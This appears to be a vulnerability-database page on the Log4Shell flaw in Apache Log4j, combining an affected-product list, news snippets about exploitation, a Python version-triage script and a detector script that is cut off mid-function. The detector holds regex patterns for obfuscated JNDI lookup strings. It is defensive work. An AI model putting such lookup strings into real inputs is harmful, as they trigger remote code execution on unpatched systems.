Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
| Vulnerable Product |
|---|
| apache log4j 2.0 |
| apache log4j |
| siemens sppa-t3000_ses3000_firmware |
| siemens logo! soft comfort |
| siemens spectrum power 4 4.70 |
| siemens spectrum power 4 |
| siemens siveillance control pro |
| siemens energyip prepay 3.7 |
| siemens energyip prepay 3.8 |
| siemens siveillance identity 1.6 |
| siemens siveillance identity 1.5 |
| siemens siveillance command |
| siemens sipass integrated 2.85 |
| siemens sipass integrated 2.80 |
| siemens head-end system universal device integration system |
| siemens gma-manager |
| siemens energyip 8.5 |
| siemens energyip 8.6 |
| siemens energyip 8.7 |
| siemens energyip 9.0 |
| siemens energy engage 3.1 |
| siemens e-car operation center |
| siemens desigo cc info center 5.0 |
| siemens desigo cc info center 5.1 |
| siemens desigo cc advanced reports 4.1 |
| siemens desigo cc advanced reports 4.2 |
| siemens desigo cc advanced reports 5.0 |
| siemens desigo cc advanced reports 5.1 |
| siemens desigo cc advanced reports 4.0 |
| siemens comos |
| siemens captial 2019.1 |
| siemens navigator |
| siemens xpedition package integrator - |
| siemens xpedition enterprise - |
| siemens vesys 2019.1 |
| siemens vesys |
| siemens teamcenter |
| siemens spectrum power 7 2.30 |
| siemens spectrum power 7 |
| siemens solid edge harness design 2020 |
| siemens solid edge harness design |
| siemens solid edge cam pro |
| siemens siveillance viewpoint |
| siemens siveillance vantage |
| siemens siguard dsa 4.3 |
| siemens siguard dsa 4.4 |
| siemens siguard dsa 4.2 |
| siemens sentron powermanager 4.2 |
| siemens sentron powermanager 4.1 |
| siemens operation scheduler |
| siemens nx |
| siemens opcenter intelligence |
| siemens mindsphere |
| siemens mendix |
| siemens industrial edge management hub |
| siemens industrial edge management |
| siemens captial |
| intel audio development kit - |
| intel system debugger - |
| intel secure device onboard - |
| intel oneapi sample browser - |
| intel sensor solution firmware development kit - |
| intel computer vision annotation tool - |
| intel genomics kernel library - |
| intel system studio - |
| intel data center manager - |
| debian debian linux 9.0 |
| debian debian linux 10.0 |
| debian debian linux 11.0 |
| fedoraproject fedora 34 |
| fedoraproject fedora 35 |
| sonicwall email security |
| netapp oncommand insight - |
| netapp cloud insights - |
| netapp active iq unified manager - |
| netapp cloud manager - |
| netapp cloud secure agent - |
| netapp ontap tools - |
| netapp snapcenter - |
| cisco unified communications manager im and presence service 11.5(1) |
| cisco unified customer voice portal 11.6 |
| cisco webex meetings server |
| cisco packaged contact center enterprise 11.6(1) |
| cisco webex meetings server 3.0 |
| cisco identity services engine |
| cisco data center network manager |
| cisco webex meetings server 4.0 |
| cisco unified contact center express |
| cisco data center network manager 11.3(1) |
| cisco identity services engine 2.4.0 |
| cisco finesse |
| cisco finesse 12.6(1) |
| cisco nexus dashboard |
| cisco network services orchestrator |
| cisco iot operations dashboard - |
| cisco intersight virtual appliance |
| cisco evolved programmable network manager |
| cisco dna spaces connector |
| cisco cyber vision sensor management extension |
| cisco crosswork zero touch provisioning |
| cisco crosswork zero touch provisioning 3.0.0 |
| cisco crosswork platform infrastructure |
| cisco crosswork platform infrastructure 4.1.0 |
| cisco crosswork optimization engine |
| cisco crosswork optimization engine 3.0.0 |
| cisco crosswork network controller 3.0.0 |
| cisco crosswork network controller |
| cisco crosswork data gateway 3.0.0 |
| cisco crosswork data gateway |
| cisco common services platform collector |
| cisco cloudcenter |
| cisco cloudcenter workload manager |
| cisco cloudcenter suite admin |
| cisco cloudcenter cost optimizer |
| cisco business process automation |
| cisco automated subsea tuning |
| cisco nexus insights |
| cisco advanced malware protection virtual private cloud appliance |
| cisco customer experience cloud agent |
| cisco workload optimization manager |
| cisco ucs central |
| cisco ucs director |
| cisco sd-wan vmanage |
| cisco optical network controller |
| cisco fog director - |
| cisco dna center |
| cisco integrated management controller supervisor |
| cisco wan automation engine |
| cisco virtualized infrastructure manager |
| cisco network assurance engine |
| cisco virtual topology system |
| cisco smart phy |
| cisco prime service catalog |
| cisco connected mobile experiences - |
| cisco video surveillance operations manager |
| cisco unity connection |
| cisco virtualized voice browser |
| cisco unified workforce optimization |
| cisco unified sip proxy |
| cisco unified intelligence center |
| cisco unified customer voice portal |
| cisco unified customer voice portal 12.0 |
| cisco unified customer voice portal 12.5 |
| cisco unified contact center enterprise |
| cisco unified contact center enterprise 11.6(2) |
| cisco unified communications manager im and presence service |
| cisco unified communications manager |
| cisco unified communications manager 11.5(1)su3 |
| cisco unified communications manager 11.5(1) |
| cisco paging server |
| cisco packaged contact center enterprise |
| cisco enterprise chat and email |
| cisco emergency responder |
| cisco contact center management portal |
| cisco contact center domain manager |
| cisco cloud connect |
| cisco broadworks |
| cisco fxos 7.0.0 |
| cisco fxos 6.7.0 |
| cisco fxos 6.6.0 |
| cisco fxos 6.5.0 |
| cisco fxos 6.4.0 |
| cisco fxos 6.3.0 |
| cisco fxos 6.2.3 |
| cisco fxos 7.1.0 |
| cisco prime service catalog 12.1 |
| cisco firepower threat defense 6.2.3 |
| cisco firepower threat defense 6.4.0 |
| cisco firepower threat defense 6.3.0 |
| cisco unity connection 11.5 |
| cisco firepower threat defense 6.5.0 |
| cisco firepower threat defense 6.6.0 |
| cisco sd-wan vmanage 20.3 |
| cisco sd-wan vmanage 20.6 |
| cisco sd-wan vmanage 20.5 |
| cisco cyber vision sensor management extension 4.0.2 |
| cisco dna spaces connector - |
| cisco unified sip proxy 010.002(001) |
| cisco unified sip proxy 010.002(000) |
| cisco unified sip proxy 010.000(001) |
| cisco unified sip proxy 010.000(000) |
| cisco unified intelligence center 12.6(2) |
| cisco unified intelligence center 12.6(1) |
| cisco unified customer voice portal 12.6(1) |
| cisco unified customer voice portal 12.5(1) |
| cisco unified customer voice portal 12.0(1) |
| cisco unified customer voice portal 11.6(1) |
| cisco unified contact center express 12.5(1) |
| cisco unified communications manager im & presence service 11.5(1.22900.6) |
| cisco unified communications manager im & presence service 11.5(1) |
| cisco unified communications manager 11.5(1.22900.28) |
| cisco unified communications manager 11.5(1.21900.40) |
| cisco unified communications manager 11.5(1.18900.97) |
| cisco unified communications manager 11.5(1.18119.2) |
| cisco unified communications manager 11.5(1.17900.52) |
| cisco paging server 9.1(1) |
| cisco paging server 9.0(2) |
| cisco paging server 9.0(1) |
| cisco paging server 8.5(1) |
| cisco paging server 8.4(1) |
| cisco paging server 8.3(1) |
| cisco paging server 14.0(1) |
| cisco paging server 12.5(2) |
| cisco unified contact center enterprise 12.6(2) |
| cisco unified contact center enterprise 12.6(1) |
| cisco unified contact center enterprise 12.5(1) |
| cisco unified contact center enterprise 12.0(1) |
| cisco finesse 12.5(1) |
| cisco enterprise chat and email 12.6(1) |
| cisco enterprise chat and email 12.5(1) |
| cisco enterprise chat and email 12.0(1) |
| cisco emergency responder 11.5(4.66000.14) |
| cisco emergency responder 11.5(4.65000.14) |
| cisco emergency responder 11.5 |
| cisco unified contact center management portal 12.6(1) |
| cisco unified contact center express 12.6(2) |
| cisco unified contact center express 12.6(1) |
| cisco broadworks - |
| cisco unified computing system 006.008(001.000) |
| cisco ucs central software 2.0(1l) |
| cisco ucs central software 2.0(1k) |
| cisco ucs central software 2.0(1h) |
| cisco ucs central software 2.0(1g) |
| cisco ucs central software 2.0(1f) |
| cisco ucs central software 2.0(1e) |
| cisco ucs central software 2.0(1d) |
| cisco ucs central software 2.0(1c) |
| cisco ucs central software 2.0(1b) |
| cisco ucs central software 2.0(1a) |
| cisco ucs central software 2.0 |
| cisco integrated management controller supervisor 2.3.2.0 |
| cisco integrated management controller supervisor 002.003(002.000) |
| cisco sd-wan vmanage 20.6.1 |
| cisco sd-wan vmanage 20.8 |
| cisco sd-wan vmanage 20.7 |
| cisco sd-wan vmanage 20.4 |
| cisco optical network controller 1.1 |
| cisco network assurance engine 6.0(2.1912) |
| cisco dna center 2.2.2.8 |
| cisco wan automation engine 7.6 |
| cisco wan automation engine 7.5 |
| cisco wan automation engine 7.4 |
| cisco wan automation engine 7.3 |
| cisco wan automation engine 7.2.3 |
| cisco wan automation engine 7.2.2 |
| cisco wan automation engine 7.2.1 |
| cisco wan automation engine 7.1.3 |
| cisco virtual topology system 2.6.6 |
| cisco smart phy 3.2.1 |
| cisco smart phy 3.1.5 |
| cisco smart phy 3.1.4 |
| cisco smart phy 3.1.3 |
| cisco smart phy 3.1.2 |
| cisco smart phy 21.3 |
| cisco network services orchestrator - |
| cisco intersight virtual appliance 1.0.9-343 |
| cisco evolved programmable network manager 5.1 |
| cisco evolved programmable network manager 5.0 |
| cisco evolved programmable network manager 4.1 |
| cisco evolved programmable network manager 4.0 |
| cisco evolved programmable network manager 3.1 |
| cisco evolved programmable network manager 3.0 |
| cisco network dashboard fabric controller 11.5(3) |
| cisco network dashboard fabric controller 11.5(2) |
| cisco network dashboard fabric controller 11.5(1) |
| cisco network dashboard fabric controller 11.4(1) |
| cisco network dashboard fabric controller 11.3(1) |
| cisco network dashboard fabric controller 11.2(1) |
| cisco network dashboard fabric controller 11.1(1) |
| cisco network dashboard fabric controller 11.0(1) |
| cisco video surveillance manager 7.14(4.018) |
| cisco video surveillance manager 7.14(3.025) |
| cisco video surveillance manager 7.14(2.26) |
| cisco video surveillance manager 7.14(1.26) |
| cisco unified workforce optimization 11.5(1) |
| cisco unity connection 11.5(1.10000.6) |
| cisco cloudcenter suite 5.3(0) |
| cisco cloudcenter suite 5.5(0) |
| cisco cloudcenter suite 5.4(1) |
| cisco automated subsea tuning 02.01.00 |
| cisco identity services engine 003.002(000.116) |
| cisco identity services engine 003.001(000.518) |
| cisco identity services engine 003.000(000.458) |
| cisco identity services engine 002.007(000.356) |
| cisco identity services engine 002.006(000.156) |
| cisco identity services engine 002.004(000.914) |
| cisco firepower threat defense 7.1.0 |
| cisco firepower threat defense 7.0.0 |
| cisco firepower threat defense 6.7.0 |
| cisco network insights for data center 6.0(2.1914) |
| cisco cx cloud agent 001.012 |
| cisco mobility services engine - |
| cisco cloudcenter suite 5.5(1) |
| cisco cloudcenter suite 4.10(0.15) |
| cisco dna spaces - |
| cisco cyber vision 4.0.2 |
| cisco connected analytics for network deployment 7.3 |
| cisco connected analytics for network deployment 008.000.000.000.004 |
| cisco connected analytics for network deployment 008.000.000 |
| cisco connected analytics for network deployment 007.003.003 |
| cisco connected analytics for network deployment 007.003.001.001 |
| cisco connected analytics for network deployment 007.003.000 |
| cisco connected analytics for network deployment 007.002.000 |
| cisco connected analytics for network deployment 007.001.000 |
| cisco connected analytics for network deployment 007.000.001 |
| cisco connected analytics for network deployment 006.005.000.000 |
| cisco connected analytics for network deployment 006.005.000. |
| cisco connected analytics for network deployment 006.004.000.003 |
| cisco crosswork network automation 4.1.1 |
| cisco crosswork network automation 4.1.0 |
| cisco crosswork network automation - |
| cisco crosswork network automation 3.0.0 |
| cisco crosswork network automation 2.0.0 |
| cisco common services platform collector 002.010(000.000) |
| cisco common services platform collector 002.009(001.002) |
| cisco common services platform collector 002.009(001.001) |
| cisco common services platform collector 002.009(001.000) |
| cisco common services platform collector 002.009(000.002) |
| cisco common services platform collector 002.009(000.001) |
| cisco common services platform collector 002.009(000.000) |
| snowsoftware vm access proxy |
| snowsoftware snow commander |
| bentley synchro 4d |
| bentley synchro |
| percussion rhythmyx |
Log4j Vulnerabilities: Attack Insights (Symantec Threat Intelligence, posted 23 Dec 2021, 4 min read). Symantec data shows variation and scope of attacks. Apache Log4j is a Java-based logging utility. The library's main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...
Apache Log4j Zero-Day Being Exploited in the Wild (Symantec Threat Intelligence, posted 11 Dec 2021, 1 min read). Symantec products will protect against attempted exploits of the critical CVE-2021-44228 vulnerability. A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...
Budworm: Espionage Group Returns to Targeting U.S. Organizations (Symantec Threat Intelligence, posted 13 Oct 2022, 5 min read). Recent attacks by the group have spanned continents and include the first confirmed attacks seen against the U.S. in a number of years. The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...
Ransomware: How Attackers are Breaching Corporate Networks (Symantec Threat Intelligence, posted 28 Apr 2022, 8 min read). Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations. Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...
Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets (Symantec Threat Intelligence, posted 27 Apr 2022, 5 min read). The espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications. The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...
The Threat Landscape in 2021 (Symantec Threat Intelligence, posted 19 Jan 2022, 6 min read). Symantec takes a look at the cyber security trends that shaped the year. From the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at some of t...
IT threat evolution in Q3 2022 (Kaspersky; companion reports: "IT threat evolution in Q3 2022. Non-mobile statistics" and "IT threat evolution in Q3 2022. Mobile statistics"). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: according to Kaspersky Security Network, in Q3 2022, Kaspersky solutions blocked 956,074,958 attacks from online resources acros...
IT threat evolution in Q2 2022 (Kaspersky; companion reports: "IT threat evolution in Q2 2022. Non-mobile statistics" and "IT threat evolution in Q2 2022. Mobile statistics"). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: according to Kaspersky Security Network, in Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. ...
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.
After its disclosure in December 2021, multiple threat act...
A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.
“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien Labs in a recent post. “The malware is rapidly adopting one-day vulnerab...
It’s been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.
Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits,
continues to be a large-scale problem and a grave security risk.
The last time we touched the subject of Log4Shell exploitation was roughly two m...
The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.
Spring4Shell is a
tracked as CVE-2022-22965, affecting Spring Framework, a widely used enterprise-level Java app development platform.
Spring released emergency updates to
a few days after its discovery, but threat actors' exploitation of vulnerable deployments was already underway.
While ...
USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...
The UK's NHS Digital agency is warning organizations to apply new security updates for a remote code execution vulnerability in the Windows client for the Okta Advanced Server Access authentication management platform.
"NHS Digital is the national digital, data and technology delivery partner for the NHS and social care system," explains
for NHS Digital.
In an
released yesterday, all organizations are advised to apply the latest patches for the Okta Advanced...
Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is “the most serious vulnerability that [she has] seen in her career.” It’s not a stretch to say the whole security industry would agree.
December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know— on Dece...
In a warning issued on Thursday, the Dutch National Cybersecurity Centre (NCSC) says organizations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.
Even though the aftermath of recent incidents connected to Log4Shell exploitation was "not too bad" because many organizations have acted quickly to mitigate these critical vulnerabilities, the NCSC says that threat actors are most likely still planning to breach new targets.
"It is ex...
Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.
This is a confusing story: Initially, Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.
SolarWinds had issued a fix the day before, on Tuesday.
SolarWinds subsequently reached...
It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.
First of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the most serious vulnerability she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberatta...
Today, the Russian government announced that they
on behalf of US authorities.
While the ransomware gang members are only being charged with "illegal circulation of means of payment," the arrests are the first public action by Russia to stem the activities of ransomware gangs operating within the country.
Furthermore, Russia states that they took this action on behalf of US law enforcement, who they have historically been reluctant to help in criminal cybercrime investigation...
It's not as though folks haven't been warned about this
There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository.
That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.
Tracked as CVE-2021...
The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor is targeting vulnerable machines exposed on the public web from domains that impersonate legitimate companies, some of them in the technology and cybersecurity sectors.
Spotted in late December 2021 by security researcher MalwareHunterTeam,
. It has encrypted multiple vic...
UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.
Log4Shell is an exploit for
, a critical arbitrary remote code execution flaw in the Apache Log4j 2.14, which has been under active and
since December 2021.
Apache addressed the above and four more vulnerabilities via subsequent security updates, and
is now considered adequately secure.
According t...
The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data from the risks of the Log4j vulnerabilities, it warned on Tuesday.
“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” according to the warning.
Those companies that bungle consumer d...
Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else.
In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late.
The FTC is advising companies to consu...
No surprise here: The holidays bought no Log4Shell relief.
Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.
“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Micro...
Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.
Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack on a large undisclosed academic institution, according to research released Wednesday.
“Aquatic Panda is a China-based [APT] with a dual mission of intelligence c...
One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version.
Soon enough, threat actors approached ONUS to extort a $5 million sum and threatened to publish the customer data should ONUS refuse to comply.
After the company's refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums.
On December 9th, the
for the notorious
Apache has released another Log4j version, 2.17.1, fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Unlike Log4Shell, it requires an attacker who can already modify the logging configuration (it abuses the JDBC Appender's JNDI data source), so it carries a lower severity rating than CVE-2021-44228.
Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.
Mass exploitation of the original
(CVE-2021-44228) by threat actors began around December 9th, when a
for it surfaced on GitHub.
Given Log4j's vast usage in the majority...
As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).
While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-re...
The Department of Homeland Security (DHS) has announced that the 'Hack DHS' program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities.
"In response to the recently discovered log4j vulnerabilities, @DHSgov is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems,"
DHS Secretary Alejandro N. Mayorkas.
"In partnersh...
No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.
Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to t...
Third major fix in ten days is an infinite recursion flaw rated 7.5/10
The Apache Software Foundation (ASF) has revealed a third bug in its Java-based open-source logging library Log4j.
CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j.
That’s the third new version of the tool in the last ten days.
In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remot...
Federal agencies have a week to get their systems patched
The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.
Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released...
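The version triage that the CISA directive above, the 2.17.0 and 2.17.1 releases reported earlier on this page, and the Sonatype download figures all call for, as an added Python example (not code from Vulmon, from any of the quoted articles, or from Apache Log4j). It walks a jar or war, including archives nested inside it, reads the Maven `pom.properties` that `log4j-core` ships, reports which of CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 are still open at that version, and checks whether `JndiLookup.class` is present. Fixed versions are Apache's security releases (2.15.0, 2.16.0, 2.17.0, 2.17.1 on the main line; 2.12.2, 2.12.3, 2.12.4 for Java 7; 2.3.1, 2.3.2 for Java 6) and the first-affected versions follow Apache's advisories; NVD's own range for CVE-2021-44228 extends through 2.15.0 because that fix was incomplete (CVE-2021-45046). The `app.war` bundling a 2.14.1 and a 2.17.1 core is constructed in memory so the script runs offline.

```python
"""Triage Log4j 2 in a jar/war tree: version -> open CVEs, JndiLookup present?

Added example; not code from Vulmon, the quoted articles or Apache Log4j.
The sample app.war is constructed in memory so the script runs offline.
"""
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")

# Version tuples: (major, minor, patch, stage, pre) with alpha < beta < rc < release.
STAGE = {"alpha": 0, "beta": 1, "rc": 2, None: 3}
# First affected version per Apache's advisories.
FIRST_AFFECTED = {
    "CVE-2021-44228": (2, 0, 0, 1, 9),   # 2.0-beta9, when JndiLookup was added
    "CVE-2021-45046": (2, 0, 0, 1, 9),
    "CVE-2021-45105": (2, 0, 0, 0, 1),   # 2.0-alpha1
    "CVE-2021-44832": (2, 0, 0, 1, 7),   # 2.0-beta7
}
# First fixed version per release branch (Apache's security releases).
FIXED_IN = {
    "main": {"CVE-2021-44228": (2, 15, 0), "CVE-2021-45046": (2, 16, 0),
             "CVE-2021-45105": (2, 17, 0), "CVE-2021-44832": (2, 17, 1)},
    "2.12": {"CVE-2021-44228": (2, 12, 2), "CVE-2021-45046": (2, 12, 2),
             "CVE-2021-45105": (2, 12, 3), "CVE-2021-44832": (2, 12, 4)},
    "2.3": {"CVE-2021-44228": (2, 3, 1), "CVE-2021-45046": (2, 3, 1),
            "CVE-2021-45105": (2, 3, 1), "CVE-2021-44832": (2, 3, 2)},
}

def parse_version(text):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.17.1' -> (2, 17, 1, 3, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    return (int(m[1]), int(m[2]), int(m[3] or 0), STAGE[m[4]], int(m[5] or 0))

def open_cves(version):
    """CVEs not yet fixed at this log4j-core version; None if it is not Log4j 2."""
    v = parse_version(version)
    if v[0] != 2:
        return None
    branch = "2.3" if v[:2] == (2, 3) else "2.12" if v[:2] == (2, 12) else "main"
    return [cve for cve, fix in FIXED_IN[branch].items()
            if FIRST_AFFECTED[cve] <= v and v[:3] < fix]

def iter_archives(data, path):
    """Yield (path, ZipFile) for this archive and every archive nested in it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        yield path, zf
        for name in zf.namelist():
            if name.lower().endswith(NESTED):
                yield from iter_archives(zf.read(name), f"{path}!/{name}")

def triage(data, path="archive"):
    """One record per log4j-core found anywhere in the archive tree."""
    findings = []
    for where, zf in iter_archives(data, path):
        names = set(zf.namelist())
        if POM_PROPS not in names:
            continue
        props = dict(line.split("=", 1)
                     for line in zf.read(POM_PROPS).decode().splitlines()
                     if "=" in line and not line.startswith("#"))
        version = props.get("version", "").strip()
        findings.append({
            "path": where,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            "open_cves": open_cves(version) if version else None,
        })
    return findings

def make_core_jar(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar: only the entries triage reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#Generated by Maven\nversion={version}\n"
                               "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()

def make_sample_war():
    """Constructed app.war shipping a vulnerable 2.14.1 next to a patched 2.17.1."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_core_jar("2.14.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", make_core_jar("2.17.1"))
        zf.writestr("WEB-INF/classes/Hello.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()

if __name__ == "__main__":
    for finding in triage(make_sample_war(), "app.war"):
        print(finding)
```

A `jndi_lookup_present` of False on an old version means the class-removal workaround (`zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`) was applied; that closes the `${jndi:...}` path but does nothing for CVE-2021-45105 or CVE-2021-44832, so `open_cves` still drives the upgrade decision. Shaded or repackaged builds may drop `pom.properties`; for those, presence of `JndiLookup.class` is the only signal this script has, so treat an archive with the class but no version record as unverified rather than clean.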
Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.
KnownSec 404 Team's Heige first reported these attacks
on Monday after observing that the ransomware was dropped on old Windows systems using exploits abusing the flaw tracked as CVE-2021-44228 and known as
.
Heige's report was confir...
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting t...
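A detector for the lookup strings described in the CVE text at the top of this page and in the LDAP-to-RMI shift described just above, written as an added Python example (not code from Vulmon, from any of the quoted articles, or from Apache Log4j). It URL-decodes each line, folds the `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that attackers nest around the literal `jndi` token to defeat plain string matching, then reports which JNDI scheme (ldap, rmi, dns) the request would have reached out with. The access-log lines and the `attacker.example` hostnames are constructed for the example.

```python
"""Find JNDI lookup attempts (Log4Shell indicators) in log lines.

Added example; not code from Vulmon, the quoted articles or Apache Log4j.
Sample log lines and the attacker.example hosts are constructed.
"""
import re
from urllib.parse import unquote

# Innermost ${...} (no nested "${" inside the braces).
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation is folded away: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def _fold(m):
    """Evaluate the lookups attackers use purely to hide the 'jndi' token."""
    body = m.group(1)
    if ":-" in body:                        # ${x:-default} and ${::-j} -> default text
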